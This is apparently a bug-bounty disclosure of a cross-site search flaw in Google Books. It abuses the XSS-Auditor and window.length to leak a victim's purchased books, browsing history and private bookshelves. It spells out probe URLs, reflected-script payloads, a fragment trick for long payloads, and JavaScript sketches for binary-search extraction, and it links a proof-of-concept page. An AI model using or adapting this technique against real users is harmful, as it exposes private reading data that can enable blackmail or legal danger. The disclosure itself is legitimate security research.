Google Books leakage
Summary
Leaking a user’s private data, such as purchased books, book browsing history and private bookshelves, from the Google Books website by abusing the XSS-Auditor and window.length.
Introduction
Recently, I have been looking for XS-Search [1] vulnerabilities all over Google. While testing Google Books, I discovered that slight changes are made to the page’s source code depending on the search results. It looked like a good entry point for an XS-Search attack; indeed, by abusing the XSS-Auditor I managed to exfiltrate a user’s private information through a prepared website.
When inspecting the source code of the page, I noticed that if at least one book is shown in the search results, a specific piece of JavaScript code is inserted, and that this doesn’t happen otherwise. The code starts with:
<script>if (window['_OC_registerHover']){_OC_registerHover({"title":"<title>"
where <title> is the book title of the first record.
For a given <title> and the user’s <uid>, I was able to create the payload https://books.google.com/books?uid=<uid>&num=1&q=<title>&x=<script>if (window['_OC_registerHover']){_OC_registerHover({"title":"<title>"
If the query &q=<title> returns a record, the window will be blocked by the XSS-Auditor (because the “reflected” parameter xss is detected), and it won’t be blocked otherwise.
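The payload construction described above can be sketched as a small URL builder. This is only an illustration, not the code from the proof of concept: the function names snippetFor and buildProbeUrl are hypothetical, and the sketch assumes the title appears in the page exactly as typed (no extra escaping by Google Books).

```javascript
// Hypothetical helper: the start of the script that the page is described
// as emitting when the first search result has the given title.
function snippetFor(title) {
  return "<script>if (window['_OC_registerHover']){_OC_registerHover({\"title\":\"" + title + "\"";
}

// Hypothetical helper: builds the probe URL from the text. The snippet is
// repeated in the dummy parameter x so that it looks "reflected" when the
// page really contains it.
function buildProbeUrl(uid, title) {
  const params = [
    "uid=" + encodeURIComponent(uid),
    "num=1",
    "q=" + encodeURIComponent(title),
    "x=" + encodeURIComponent(snippetFor(title)),
  ];
  return "https://books.google.com/books?" + params.join("&");
}
```

Calling buildProbeUrl("<uid>", "<title>") with real values yields one URL per candidate title.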
Another observation I made is that when the page is blocked by the XSS-Auditor, window.length is equal to 0 (which means no iframes are embedded); otherwise, it quickly becomes greater than 0.
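The window.length observation can be turned into a yes/no signal roughly as follows. This is a sketch under assumptions: the names looksBlocked and sampleWindowLength, the timeout and the polling interval are all hypothetical, and win stands for a reference to the window that was navigated to the probe URL.

```javascript
// Decide from a series of window.length samples whether the page was blocked.
// Assumption (from the text): a blocked page stays at 0, a normal page
// soon embeds at least one frame.
function looksBlocked(samples) {
  return samples.length > 0 && samples.every((n) => n === 0);
}

// Read win.length every intervalMs until it becomes non-zero or timeoutMs
// has passed, then resolve with all collected samples.
function sampleWindowLength(win, timeoutMs, intervalMs) {
  return new Promise((resolve) => {
    const samples = [];
    const started = Date.now();
    const timer = setInterval(() => {
      const current = win.length;
      samples.push(current);
      if (current > 0 || Date.now() - started >= timeoutMs) {
        clearInterval(timer);
        resolve(samples);
      }
    }, intervalMs);
  });
}
```

In a browser the two would be combined as sampleWindowLength(win, 3000, 50).then(looksBlocked); the 3000 ms and 50 ms values are placeholders, not measured numbers.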
These observations allow the attacker to take a list of book titles and determine, for each one, whether the victim ever “touched” that title. In the next sections, I will demonstrate a much more advanced attack which exfiltrates more detailed information.
Going further – uid=vulnerability
The main downside of the attack presented in the previous section (#Introduction) is that the attacker has to know the victim’s <uid>, which makes the attack much less widely applicable. To extend it further, I decided to test a few things out. Those experiments led me to the following observations:
The behavior is super strange, but the last observation allows the attacker to perform an XS-Search attack without knowing the victim’s <uid>.
Efficient attack
Thanks to #Going further – uid=vulnerability, we have already extended the attack considerably, but we are not done yet.
To begin this chapter, it’s important to mention that the results can be limited to one record by setting the query parameter num=1 and can be accessed at any offset with the help of start=<offset>. This allows searching through the library one title after another.
Also, by knowing the <id> of a specific shelf, we can limit the results to records from that container only, which is done by setting the parameter as_coll=<id>. The default bookshelves have their <id> in the range [0, 10] (e.g. Browsing History has as_coll=9) and the custom ones are incremental, starting with as_coll=1001. This allows the attacker to explore the victim’s private bookshelves.
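To make the role of num, start and as_coll concrete, here is a minimal sketch that generates one URL per position on a shelf. The helper names buildShelfUrl and shelfProbeUrls are hypothetical, and the uid value is simply passed through as given.

```javascript
// Hypothetical helper: URL for the single record at `offset` on shelf `shelfId`.
function buildShelfUrl(uid, shelfId, offset) {
  const params = [
    "uid=" + encodeURIComponent(uid),
    "as_coll=" + encodeURIComponent(String(shelfId)),
    "num=1", // one record per page
    "start=" + encodeURIComponent(String(offset)),
  ];
  return "https://books.google.com/books?" + params.join("&");
}

// Hypothetical helper: walks a shelf one record at a time.
function* shelfProbeUrls(uid, shelfId, count) {
  for (let offset = 0; offset < count; offset++) {
    yield buildShelfUrl(uid, shelfId, offset);
  }
}
```

For example, [...shelfProbeUrls("vuln", 9, 3)] gives the URLs for the first three records of the Browsing History shelf.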
Another key observation is that the attacker doesn’t have to brute-force queries title by title. The XSS-Auditor can be tricked by providing multiple “reflected” payloads in one query, ?x=<payload1><payload2><payload3>.., where the page will be blocked if at least one <payloadN> matches the resulting code. Because of this, the attacker can quickly find a match using algorithms such as binary search. The only limitation here is the URL length limit enforced by the server, which can easily be bypassed by using the hash #x=.. instead of the query ?x=.. This works because the hash part #x= is not sent to the server, and there is a bug in the XSS-Auditor [2] that makes the Auditor search for reflections in URL fragments as well. It also seems that the length of the hash part is pretty much unlimited: I successfully injected 500k characters.
Combining all the presented observations allows the attacker to obtain detailed information about the victim in an extremely efficient way.
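The multi-payload trick can be sketched as follows: several candidate snippets are concatenated and placed in the URL fragment, so one page load tests a whole set of titles. The names snippetFor and buildFragmentProbe are hypothetical, and percent-encoding the fragment is an assumption of this sketch rather than something stated above.

```javascript
// Hypothetical helper: the script prefix expected in the page for a title.
function snippetFor(title) {
  return "<script>if (window['_OC_registerHover']){_OC_registerHover({\"title\":\"" + title + "\"";
}

// Hypothetical helper: appends all candidate snippets as #x=<payload1><payload2>...
// The fragment is never sent to the server, so the server-side URL length
// limit does not apply to it.
function buildFragmentProbe(baseUrl, titles) {
  const payloads = titles.map(snippetFor).join("");
  return baseUrl + "#x=" + encodeURIComponent(payloads);
}
```

With this, a single request covers an arbitrary subset of the candidate list, which is what makes a binary search over titles possible.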
Attack scenario
A regular user of Google Books can have their private information leaked when visiting a prepared website. The leaked information consists of items such as Searched Books, Private Book Collections, Purchased Books etc. The attacker can use this information to embarrass, blackmail or threaten the victim, or even to bring legal consequences upon them, because specific books may be banned in some countries (https://en.wikipedia.org/wiki/List_of_books_banned_by_governments).
Setup
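I have created a proof of concept, https://terjanq.github.io/Bug-Bounty/Google/books-xs-search-enpgws9jw5mb/poc.html, but to make it fully work you will need:
- Bookshelves S1 and S2 created, together with their <id> (bookshelves can be created in My Library, https://books.google.com/books?uid=<uid>&hl=en; the <id> can be obtained just by watching the URL for as_coll=<id> after visiting the created shelf)
- Titles for S1 chosen from https://terjanq.github.io/Bug-Bounty/Google/books-xs-search-enpgws9jw5mb/urls.html
- Titles for S2 chosen from https://terjanq.github.io/Bug-Bounty/Google/books-xs-search-enpgws9jw5mb/urls.html
Tested on the newest Google Chrome - Version 71.0.3578.98 (Official Build) (64-bit)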
Steps to reproduce
- Visit https://terjanq.github.io/Bug-Bounty/Google/books-xs-search-enpgws9jw5mb/poc.html and click anywhere on the website.
- Choose an option and fill in the required fields with the information obtained from #Setup
- Wait for the results
Behind the scenes
- Upon visiting the website and performing an action, a new window is opened. The former one will be used for further redirections.
- Upon choosing an option:
2a. Have I touched that title?
- a request to https://books.google.com/books?uid=vuln&num=1&q=<title>&x=<xss> is made in the background, where <xss> is the payload mentioned in #Introduction
- the script watches for a change in window.length: if it changes to 1, the <title> was not found in the victim’s library. Otherwise, after a fixed amount of time, the script concludes that the page was blocked by the Auditor and hence that the <title> was found.
2b. What ONE title have I chosen?
- a binary search is run in the background, halving the list of titles in each turn depending on which half contains the title. The URL of the requests is https://books.google.com/books?uid=vuln&as_coll=<id>&num=1&start=<offset>#x=<xss>.
2c. What FIVE titles have I chosen?
- same as 2a but repeated 5 times.
- Results are being displayed.
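The halving step from 2b can be sketched like this. It is a simplified, synchronous illustration and not the proof of concept’s code: findTitle is a hypothetical name, and oracle stands for “load a page with payloads for this subset and report whether it was blocked”, which in a real browser would be asynchronous.

```javascript
// Binary search over a candidate list. oracle(subset) must return true when
// at least one title in the subset matches (i.e. the page would be blocked).
function findTitle(titles, oracle) {
  let probes = 1;
  // One probe with the full list tells us whether a match exists at all.
  if (!oracle(titles)) return { title: null, probes };

  let lo = 0;
  let hi = titles.length; // the match lies in titles[lo..hi)
  while (hi - lo > 1) {
    const mid = Math.floor((lo + hi) / 2);
    probes++;
    if (oracle(titles.slice(lo, mid))) {
      hi = mid; // match is in the left half
    } else {
      lo = mid; // otherwise it must be in the right half
    }
  }
  return { title: titles[lo], probes };
}
```

The number of probes grows with the logarithm of the list size, so even a long list of candidate titles needs only a handful of page loads.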
